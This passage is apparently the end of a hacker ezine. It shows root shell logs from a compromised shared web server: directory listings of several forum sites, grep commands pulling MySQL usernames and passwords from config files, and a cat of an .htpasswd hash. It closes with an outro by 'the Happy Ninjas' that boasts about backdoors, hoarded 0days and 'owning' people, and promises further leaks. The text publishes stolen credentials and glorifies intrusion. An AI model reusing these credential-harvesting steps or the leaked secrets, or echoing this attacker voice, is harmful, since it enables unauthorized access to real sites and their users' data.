-rw-r--r-- 1 ixde www 10278 Jun 4 12:16 joinrequests.php
-rw-r--r-- 1 ixde www 10159 Oct 7 13:51 login.php
drwxr-xr-x 2 ixde www 512 Aug 13 09:42 madp
-rw-r--r-- 1 ixde www 17000 Jun 4 12:16 member.php
-rw-r--r-- 1 ixde www 15868 Jun 4 12:16 member_inlinemod.php
-rw-r--r-- 1 ixde www 35884 Jun 4 12:16 memberlist.php
drwxr-xr-x 6 ixde www 512 Jul 8 21:24 mgc_cb_evo
-rw-r--r-- 1 ixde www 60012 May 17 2010 mgc_cb_evo.php
-rw-r--r-- 1 ixde www 49939 May 9 2010 mgc_cb_evo_ajax.php
-rw-r--r-- 1 ixde www 23803 Jun 4 12:16 misc.php
-rw-r--r-- 1 ixde www 63260 Jun 4 12:16 moderation.php
-rw-r--r-- 1 ixde www 6693 Jun 4 12:16 moderator.php
drwxr-xr-x 11 ixde www 512 Sep 25 16:46 mysqldingsbumsdadumper
-rw-r--r-- 1 ixde www 18413 Jun 4 12:16 newattachment.php
-rw-r--r-- 1 ixde www 38318 Jun 4 12:16 newreply.php
-rw-r--r-- 1 ixde www 18848 Jun 4 12:16 newthread.php
-rw-r--r-- 1 ixde www 19570 Jun 4 12:16 online.php
-rw-r--r-- 1 ixde www 7633 Jun 4 12:16 payment_gateway.php
-rw-r--r-- 1 ixde www 11847 Jun 4 12:16 payments.php
-rw-r--r-- 1 ixde www 7826 Jun 4 12:16 picture.php
-rw-r--r-- 1 ixde www 21976 Jun 4 12:16 picture_inlinemod.php
-rw-r--r-- 1 ixde www 25243 Jun 4 12:16 picturecomment.php
-rw-r--r-- 1 ixde www 27348 Jun 4 12:16 poll.php
-rw-r--r-- 1 ixde www 9449 Jun 4 12:16 posthistory.php
-rw-r--r-- 1 ixde www 74304 Jun 4 12:16 postings.php
-rw-r--r-- 1 ixde www 6530 Jun 4 12:16 printthread.php
-rw-r--r-- 1 ixde www 70620 Jun 4 12:16 private.php
-rw-r--r-- 1 ixde www 152264 Jun 4 12:16 profile.php
-rw-r--r-- 1 ixde www 39688 Jun 4 12:16 register.php
-rw-r--r-- 1 ixde www 5624 Jun 4 12:16 report.php
-rw-r--r-- 1 ixde www 13655 Jun 4 12:16 reputation.php
-rw-r--r-- 1 ixde www 124845 Jul 9 20:58 search.php
-rw-r--r-- 1 ixde www 20883 Jun 4 12:16 sendmessage.php
-rw-r--r-- 1 ixde www 10015 Aug 22 13:52 showgroups.php
-rw-r--r-- 1 ixde www 12335 Jun 4 12:16 showpost.php
-rw-r--r-- 1 ixde www 73473 Jun 4 12:16 showthread.php
drwxr-xr-x 2 ixde www 512 Jul 7 14:21 signaturepics
-rw-r--r-- 1 ixde www 32813 Jun 4 12:16 subscription.php
-rw-r--r-- 1 ixde www 13302 Jun 4 12:16 tags.php
-rw-r--r-- 1 ixde www 5582 Jul 8 00:17 thanks.php
-rw-r--r-- 1 ixde www 8628 Jun 4 12:16 threadrate.php
-rw-r--r-- 1 ixde www 12351 Jun 4 12:16 threadtag.php
-rw-r--r-- 1 ixde www 34444 Jun 4 12:16 usercp.php
-rw-r--r-- 1 ixde www 19042 Jun 4 12:16 usernote.php
drwxr-xr-x 4 ixde www 512 Jul 9 22:10 vbseo
-rw-r--r-- 1 ixde www 45332 Apr 14 2011 vbseo.php
-rw-r--r-- 1 ixde www 4073 Apr 14 2011 vbseocp.php
-rw-r--r-- 1 ixde www 27313 Jun 4 12:16 visitormessage.php
# grep username includes/config.php
// This is the username and password you use to access MySQL.
$config['MasterServer']['username'] = 'ixde_board';
$config['SlaveServer']['username'] = '';
# grep password includes/config.php
// This is the username and password you use to access MySQL.
$config['MasterServer']['password'] = '89as7f986adg6zgsd87fz';
$config['SlaveServer']['password'] = '';
----------------------------------------------------------------------
# pwd
/home/true
# ls -la
total 24
drwxr-x--- 5 true www 512 Oct 3 16:58 .
drwxr-x--x 13 root wheel 512 Sep 22 21:06 ..
drwxr-xr-x 3 true www 512 Oct 3 16:59 cyberbase.us
drwxrwx--- 28 true www 3584 Oct 2 10:13 cyberbase.usX
drwxrwxrwx 2 true www 512 Oct 3 13:32 temp
# cd cyberbase.us
# ls -la
total 16
drwxr-xr-x 3 true www 512 Oct 3 16:59 .
drwxr-x--- 5 true www 512 Oct 3 16:58 ..
drwxr-xr-x 2 true www 512 Oct 3 16:59 index-Dateien
-rw-r--r-- 1 true www 1746 Oct 3 16:58 index.htm
# cd ..
# cd cyberbase.usX
# ls -la
total 14252
drwxrwx--- 28 true www 3584 Oct 2 10:13 .
drwxr-x--- 5 true www 512 Oct 3 16:58 ..
-rw-r--r-- 1 true www 33946 Jun 13 23:29 Blackstealth 3.8.6-style.xml
-rw-r--r-- 1 true www 158910 Apr 10 2011 Cyb_AFStats.xml
-rw-r--r-- 1 true www 95002 Apr 10 2011 Cyb_CB.xml
-rw-r--r-- 1 true www 112424 May 5 17:58 Deutsch(Du).xml
-rw-r--r-- 1 true www 127492 May 15 2010 English.xml
-rw-r--r-- 1 true www 23696 May 5 12:04 ajax.php
-rw-r--r-- 1 true www 75363 May 5 12:04 album.php
-rw-r--r-- 1 true www 16987 May 5 12:04 announcement.php
-rw-r--r-- 1 true www 18161 May 5 12:04 attachment.php
-rw-r--r-- 1 true www 101273 Aug 19 20:34 bluepearl-design-logo.png
-rw-r--r-- 1 true www 75178 May 5 12:04 calendar.php
-rw-r--r-- 1 true www 86522 Apr 10 2011 class_core.php
-rw-r--r-- 1 true www 43 May 5 12:04 clear.gif
drwxr-xr-x 5 true www 2560 Jun 16 19:54 clientscript
-rw-r--r-- 1 true www 36038 Jun 16 19:58 commerce.php
-rw-r--r-- 1 true www 30943 Jun 16 19:58 commerce_item.php
-rw-r--r-- 1 true www 25995 Jun 16 19:58 commerce_shop.php
-rw-r--r-- 1 true www 14788 May 5 12:04 converse.php
drwxr-xr-x 7 true www 512 Apr 11 2011 cpstyles
-rw-r--r-- 1 true www 48250 Jun 16 19:57 credits.php
-rw-r--r-- 1 true www 3169 May 5 12:04 cron.php
drwxr-xr-x 8 true www 512 Aug 27 00:04 ctracker
drwxrwxrwx 3 true www 512 Apr 11 2011 customavatars
drwxrwxrwx 3 true www 512 Apr 11 2011 customgroupicons
drwxrwxrwx 2 true www 512 Apr 11 2011 customprofilepics
drwxr-xr-x 4 true www 512 Aug 23 15:26 dbtech
-rw-r--r-- 1 true www 47607 May 5 12:04 editpost.php
-rw-r--r-- 1 true www 29346 May 5 12:04 external.php
-rw-r--r-- 1 true www 9638 Apr 10 2011 faq.php
-rw-r--r-- 1 true www 35836 May 6 21:19 forumdisplay.php
-rw-r--r-- 1 true www 195072 Jun 9 15:06 foto.exe
-rw-r--r-- 1 true www 39789 Sep 2 14:11 global.php
-rw-r--r-- 1 true www 138040 May 5 12:04 group.php
-rw-r--r-- 1 true www 24771 May 5 12:04 group_inlinemod.php
-rw-r--r-- 1 true www 10374 May 5 12:04 groupsubscription.php
-rw-r--r-- 1 true www 1245151 Apr 30 16:30 hauptsprache-vbulletin-de-sie.xml
-rw-r--r-- 1 true www 233 May 5 12:04 hide.png
-rw-r--r-- 1 true www 8899 May 5 12:04 image.php
drwxrwxrwx 26 true www 1024 Sep 23 21:42 images
drwxr-xr-x 7 true www 5120 Jun 16 19:54 includes
-rwxrwxrwx 1 true www 19444 May 5 12:04 index.php
drwxr-xr-x 6 true www 512 Apr 11 2011 infernoshout
-rw-r--r-- 1 true www 10755 Apr 10 2011 infernoshout.php
-rw-r--r-- 1 true www 43780 May 5 12:04 infraction.php
-rw-r--r-- 1 true www 182773 May 5 12:04 inlinemod.php
-rw-r--r-- 1 true www 5734 May 7 20:24 itrader.php
-rw-r--r-- 1 true www 11544 May 7 20:24 itrader_detail.php
-rw-r--r-- 1 true www 11550 May 7 20:24 itrader_feedback.php
-rw-r--r-- 1 true www 1364 May 7 20:24 itrader_global.php
-rw-r--r-- 1 true www 19017 May 7 20:24 itrader_main.php
-rw-r--r-- 1 true www 3510 May 7 20:24 itrader_report.php
-rw-r--r-- 1 true www 10194 May 5 12:03 joinrequests.php
drwxr-xr-x 3 true www 3072 May 4 14:15 kbank
-rw-r--r-- 1 true www 64645 Apr 4 2009 kbank.php
drwxr-xr-x 2 true www 512 Aug 27 01:49 lang
-rw-r--r-- 1 true www 0 Apr 10 2011 logfile_worms.txt
-rw-r--r-- 1 true www 10074 May 5 12:03 login.php
drwxr-xr-x 2 true www 512 Jun 13 21:46 madp
-rw-r--r-- 1 true www 2458 Jun 4 13:12 mc.jar
drwxr-xr-x 2 true www 512 Aug 27 01:49 media
-rw-r--r-- 1 true www 16916 May 5 12:03 member.php
-rw-r--r-- 1 true www 15783 May 5 12:03 member_inlinemod.php
-rw-r--r-- 1 true www 35753 May 5 12:03 memberlist.php
drwxr-xr-x 6 true www 512 May 6 12:29 mgc_cb_evo
-rw-r--r-- 1 true www 60012 Sep 1 11:53 mgc_cb_evo.php
-rw-r--r-- 1 true www 49939 Sep 1 11:53 mgc_cb_evo_ajax.php
-rw-r--r-- 1 true www 23718 May 5 12:03 misc.php
-rw-r--r-- 1 true www 63176 May 5 12:03 moderation.php
-rw-r--r-- 1 true www 6608 May 5 12:03 moderator.php
drwxr-xr-x 2 true www 512 May 4 14:08 modmodmodmdodmodmdodmodmdomdodmdomdo2323324
drwxr-xr-x 3 true www 512 May 14 16:22 msqllllsdflsdfsdfsd
-rw-r--r-- 1 true www 18328 May 5 12:03 newattachment.php
-rw-r--r-- 1 true www 36953 May 5 12:03 newreply.php
-rw-r--r-- 1 true www 18763 May 5 12:03 newthread.php
-rw-r--r-- 1 true www 19456 May 5 12:03 online.php
-rw-r--r-- 1 true www 7548 May 5 12:03 payment_gateway.php
-rw-r--r-- 1 true www 11762 May 5 12:03 payments.php
-rw-r--r-- 1 true www 7741 May 5 12:03 picture.php
-rw-r--r-- 1 true www 21892 May 5 12:03 picture_inlinemod.php
-rw-r--r-- 1 true www 25159 May 5 12:03 picturecomment.php
drwxr-xr-x 2 true www 512 Jun 16 19:57 plugins
-rw-r--r-- 1 true www 27264 May 5 12:03 poll.php
-rw-r--r-- 1 true www 12964 May 5 12:03 post_thanks.php
-rw-r--r-- 1 true www 9364 May 5 12:03 posthistory.php
-rw-r--r-- 1 true www 74220 May 5 12:03 postings.php
-rw-r--r-- 1 true www 6445 May 5 12:03 printthread.php
-rw-r--r-- 1 true www 70592 May 5 12:03 private.php
-rw-r--r-- 1 true www 9766 Aug 16 13:16 product-btu.xml
-rw-r--r-- 1 true www 172777 Jun 16 19:54 product-commerce.xml
-rw-r--r-- 1 true www 48878 Jun 16 19:55 product-commerce_it_icons.xml
-rw-r--r-- 1 true www 202226 Jun 16 19:57 product-credits.xml
-rw-r--r-- 1 true www 38178 Aug 23 15:26 product-dbtech_thanks.xml
-rw-r--r-- 1 true www 8396 Apr 10 2011 product-firewall_vb_rs.xml
-rw-r--r-- 1 true www 1471 Apr 11 2011 product-gd_davatar.xml
-rw-r--r-- 1 true www 86137 May 7 20:24 product-itrader.xml
-rw-r--r-- 1 true www 45809 Jun 13 21:46 product-kiros_madp.xml
-rw-r--r-- 1 true www 358132 Sep 1 11:53 product-mgc_cb_evo.xml
-rw-r--r-- 1 true www 99567 Apr 11 2011 product-psionic_hide.xml
-rw-r--r-- 1 true www 17012 May 27 14:32 product-sevenskins_imageresizer-v1.3.xml
-rw-r--r-- 1 true www 2534 Apr 10 2011 product-ugcb.xml
-rw-r--r-- 1 true www 66736 Apr 10 2011 product_vBShout.xml
-rw-r--r-- 1 true www 152180 May 5 12:03 profile.php
drwxr-xr-x 2 true www 512 Sep 24 12:34 rang
-rw-r--r-- 1 true www 39603 May 5 12:03 register.php
-rw-r--r-- 1 true www 5539 May 5 12:03 report.php
-rw-r--r-- 1 true www 13571 May 5 12:03 reputation.php
drwxr-xr-x 3 true www 2048 Aug 23 16:04 sdfwekijrnclkdj9ch73unfuio72h9fzn
-rw-r--r-- 1 true www 124569 May 5 12:04 search.php
-rw-r--r-- 1 true www 20798 May 5 12:03 sendmessage.php
drwxr-xr-x 2 true www 512 Aug 27 01:49 shlldtct
-rw-r--r-- 1 true www 9861 May 5 12:04 showgroups.php
-rw-r--r-- 1 true www 12240 May 5 12:04 showpost.php
-rw-r--r-- 1 true www 73369 May 5 12:04 showthread.php
drwxrwxrwx 2 true www 512 Apr 11 2011 signaturepics
-rw-r--r-- 1 true www 339968 Jun 8 12:10 snapeldiesnapp.exe
drwxr-xr-x 2 true www 512 Apr 11 2011 spoiler
-rw-r--r-- 1 true www 32728 May 5 12:04 subscription.php
-rw-r--r-- 1 true www 13217 May 5 12:04 tags.php
-rw-r--r-- 1 true www 8544 May 5 12:04 threadrate.php
-rw-r--r-- 1 true www 12267 May 5 12:04 threadtag.php
drwxrwxrwx 2 true www 512 Oct 1 19:27 tmp
-rw-r--r-- 1 true www 179200 Jun 11 15:32 true.exe
-rw-r--r-- 1 true www 389251 Sep 18 12:46 unnex.rar
drwxrwxrwx 2 true www 512 May 14 21:47 upl
drwxrwxrwx 2 true www 512 Apr 11 2011 upload
-rw-r--r-- 1 true www 34360 May 5 12:04 usercp.php
-rw-r--r-- 1 true www 18947 May 5 12:04 usernote.php
-rw-r--r-- 1 true www 0 May 14 19:29 validator.php
-rw-r--r-- 1 true www 43650 Jun 12 13:15 vbulletin-style.xml
-rw-r--r-- 1 true www 27229 May 5 12:04 visitormessage.php
-rw-r--r-- 1 true www 393216 May 14 20:22 ??????1.PNG
# find . -name ".ht*"
# grep username includes/config.php
// This is the username and password you use to access MySQL.
$config['MasterServer']['username'] = 'true_forum';
$config['SlaveServer']['username'] = '';
# grep password includes/config.php
// This is the username and password you use to access MySQL.
$config['MasterServer']['password'] = 'e6sd87azstdztasdg';
$config['SlaveServer']['password'] = '';
----------------------------------------------------------------------
# pwd
/home/wayne
# ls -la
total 28
drwxr-x--- 6 wayne www 512 Sep 26 05:22 .
drwxr-x--x 13 root wheel 512 Sep 22 21:06 ..
drwxr-xr-x 12 wayne www 512 Jun 25 19:20 gtc.nu
-rw-r--r-- 1 wayne www 4 Jun 21 18:42 index.html
drwxr-xr-x 3 wayne www 512 Sep 26 05:22 secret-network.biz
drwxr-xr-x 18 wayne www 1536 Jul 8 14:38 secret-network.biz2
drwxrwx--- 2 wayne www 512 Sep 18 16:51 temp
# cd secret-network.biz2
# ls -la
total 1996
drwxr-xr-x 18 wayne www 1536 Jul 8 14:38 .
drwxr-x--- 6 wayne www 512 Sep 26 05:22 ..
drwxr-xr-x 7 wayne www 512 Jun 21 20:02 admin7894561234567854
-rw-r--r-- 1 wayne www 2719 Jun 21 20:15 announcements.php
drwxr-xr-x 2 wayne www 512 Jun 21 20:03 archive
-rw-r--r-- 1 wayne www 3575 Jun 21 20:15 attachment.php
-rw-r--r-- 1 wayne www 13166 Jun 22 22:52 banner.png
-rw-r--r-- 1 wayne www 7102 Jul 8 15:38 bewerbung.php
drwxr-xr-x 2 wayne www 1024 Jul 7 16:10 bewerbungsdaten
-rw-r--r-- 1 wayne www 696 Jul 8 15:38 bewerbungsend.php
drwxr-xr-x 2 wayne www 512 Jun 21 20:03 board
drwxrwxrwx 3 wayne www 512 Jun 21 20:17 cache
-rw-r--r-- 1 wayne www 66703 Jun 21 20:15 calendar.php
-rw-r--r-- 1 wayne www 7536 Jun 21 20:15 captcha.php
drwxr-xr-x 2 wayne www 512 Jun 21 20:18 cgi-bin
-rw-r--r-- 1 wayne www 57 Jun 22 12:34 cookie.php
-rw-r--r-- 1 wayne www 636 Jun 21 20:15 css.php
-rw-r--r-- 1 wayne www 18908 Jun 21 20:15 editpost.php
-rw-r--r-- 1 wayne www 31478 Jun 21 20:15 forumdisplay.php
-rw-r--r-- 1 wayne www 20114 Jun 22 13:08 global.php
-rw-r--r-- 1 wayne www 2684 Jun 21 20:15 htaccess.txt
drwxr-xr-x 15 wayne www 2048 Jun 21 20:20 images
drwxr-xr-x 9 wayne www 2048 Jun 22 10:29 inc
-rw-r--r-- 1 wayne www 9562 Jun 21 20:15 index.php
drwxr-xr-x 2 wayne www 512 Jun 21 20:24 indexold
drwxr-xr-x 3 wayne www 1024 Jun 21 20:24 jscripts
drwxr-xr-x 17 wayne www 1024 Jul 2 14:29 mail
-rw-r--r-- 1 wayne www 9018 Jun 21 20:15 managegroup.php
-rw-r--r-- 1 wayne www 59908 Jul 9 18:54 member.php
-rw-r--r-- 1 wayne www 10090 Jun 21 20:15 memberlist.php
-rw-r--r-- 1 wayne www 20107 Jun 21 20:15 misc.php
-rw-r--r-- 1 wayne www 102298 Jun 21 20:15 modcp.php
-rw-r--r-- 1 wayne www 69231 Jun 21 20:15 moderation.php
-rw-r--r-- 1 wayne www 14312 Jun 22 10:16 modnotice.php
drwxrwxrwx 11 wayne www 512 Jun 25 13:33 msd41567651564765156
drwxr-xr-x 2 wayne www 512 Jun 21 20:24 mybb
-rw-r--r-- 1 wayne www 13192 Jun 21 22:42 new.png
-rw-r--r-- 1 wayne www 35673 Jun 21 20:15 newreply.php
-rw-r--r-- 1 wayne www 28716 Jun 21 20:15 newthread.php
-rw-r--r-- 1 wayne www 5930 Jun 21 20:15 online.php
drwxr-xr-x 10 wayne www 3072 Jul 8 13:46 pma
-rw-r--r-- 1 wayne www 22322 Jun 21 20:15 polls.php
-rw-r--r-- 1 wayne www 5612 Jun 21 20:15 printthread.php
-rw-r--r-- 1 wayne www 59005 Jun 21 20:15 private.php
-rw-r--r-- 1 wayne www 9 Jun 21 20:15 pw.php
-rw-r--r-- 1 wayne www 3258 Jun 21 20:16 ratethread.php
-rw-r--r-- 1 wayne www 5058 Jun 21 20:16 report.php
-rw-r--r-- 1 wayne www 1940 Jun 22 10:29 reportpm.php
-rw-r--r-- 1 wayne www 23508 Jun 21 20:16 reputation.php
-rw-r--r-- 1 wayne www 407 Jun 21 20:16 rss.php
-rw-r--r-- 1 wayne www 43265 Jun 21 20:16 search.php
drwxr-xr-x 8 wayne www 512 Jul 8 14:35 securimage
-rw-r--r-- 1 wayne www 4740 Jun 21 20:16 sendthread.php
-rw-r--r-- 1 wayne www 4569 Jun 21 20:16 showteam.php
-rw-r--r-- 1 wayne www 37878 Jun 21 20:16 showthread.php
-rw-r--r-- 1 wayne www 5409 Jun 21 20:16 stats.php
-rw-r--r-- 1 wayne www 5303 Jun 21 20:16 syndication.php
-rw-r--r-- 1 wayne www 1585 Jun 21 20:16 task.php
drwxrwxrwx 3 wayne www 512 Jun 21 20:25 uploads
-rw-r--r-- 1 wayne www 98257 Jun 21 20:16 usercp.php
-rw-r--r-- 1 wayne www 4720 Jun 21 20:16 usercp2.php
-rw-r--r-- 1 wayne www 35113 Jun 21 20:16 warnings.php
-rw-r--r-- 1 wayne www 22808 Jun 21 20:16 xmlhttp.php
# find . -name ".ht*"
./cgi-bin/.htaccess
./mail/data/.htaccess
./mail/logs/.htaccess
./mail/temp/cache/.htaccess
./mail/temp/session/.htaccess
./mail/temp/.htaccess
./msd41567651564765156/.htaccess
./msd41567651564765156/.htpasswd
./pma/libraries/.htaccess
./pma/setup/frames/.htaccess
./pma/setup/lib/.htaccess
./securimage/database/.htaccess
# cat ./msd41567651564765156/.htpasswd
wayne:waBOsDVargS1U
# grep username inc/config.php
$config['database']['username'] = 'wayne_sql';
# grep password inc/config.php
$config['database']['password'] = '98adzsdgzsdhfuhsdfsdo8f';
,;~;,
_/\
\ )
(\\ ())
/';;,, // |
-------==========={ Outro }===========))))))))))))))=m( )_ __
| ,(.' '~/()' ' '\
It's been one and a half year since we pub- ~ | ||( );,
lished exp01. Three ezines full of ownages and ( ,;.)-\ / ';,
stories isn't a bad figure, is it? At least we \ ( \ (
think that those and especially this one will || \\
cause enough fear for the feature and people will /_( /_(
realize that there are still some guys left who continue to preserve
the spirit of the underground, like real hackers used to. Hackers do
not sell credit cards. Hackers hack, that means breaking into
computer systems and striving for perfection. That's our opinion, even
if most don't believe that way. We ourselves will never stop hacking.
Designing new backdooring techniques and farming 0days has become a
way of life. Owning people who deserve it and collecting data has
become a mental belief. We will be prepared for the future, even if
the kids decide to switch to Windows 8. Our belts contain more 0day
bullets than ten glocks can carry and for exceptions we have our
special task force at the Gorch Fock. No matter what, "they" will be
owned.
It's going to happen, again and again. It has to happen.
In the meantime we started to think that it might be worth
concentrating on the international scene, but that does not mean that
we stop observing any movement in the German one, even if we are sick
of it. Really sick. This is going to be the hash
c949d6f078f9c0661d0e91cce74e4ad16b30e7c9 whose plaintext value we are
going to publish in our next release so you better watch out! With
these last words we finally close this ezine.
_
_,-'/-'/
. __,-; ,'( '/
\. `-.__`-._`:_,-._ _ , . ``
`:-._,------' ` _,`--` -: `_ , ` ,' :
`---..__,,--' ` -'. -'
|\_ The show is over
/()/ _
`\| \`-\`-._
\` )`. `-.__ ,
But we are not done yet '' , . _ _,-._;'_,-`__,-' ,/
: `. ` , _' :- '--'._ ' `------._,-;'
`- ,`- ' `--..__,,---'
- the Happy Ninjas